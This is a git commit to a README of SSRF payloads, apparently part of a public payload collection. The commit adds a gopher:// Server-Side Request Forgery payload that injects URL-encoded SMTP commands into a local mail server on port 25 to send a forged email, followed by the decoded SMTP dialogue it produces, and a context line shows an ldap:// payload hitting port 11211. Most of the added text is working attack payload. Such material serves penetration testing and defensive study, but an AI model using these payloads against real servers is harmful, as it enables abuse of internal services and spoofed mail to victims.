SSRF - Gopher Protocol

2024-12-20 11:26:11 +00:00 · 2017-09-19 20:35:18 +02:00 · 2017-09-19 20:35:18 +02:00 · e7cb8a2ce1
commit e7cb8a2ce1
parent 1ca215d5d7
1 changed files with 21 additions and 0 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -94,6 +94,26 @@ Ldap://
 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 ```
 Gopher://
 ```
 ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
 will make a request like
 HELO localhost
 MAIL FROM:<hacker@site.com>
 RCPT TO:<victim@site.com>
 DATA
 From: [Hacker] <hacker@site.com>
 To: <victime@site.com>
 Date: Tue, 15 Sep 2017 17:20:26 -0400
 Subject: Ah Ah AH
 You didn't say the magic word !
 .
 QUIT
 ```
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
@ -101,3 +121,4 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
 * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
 * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
 * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)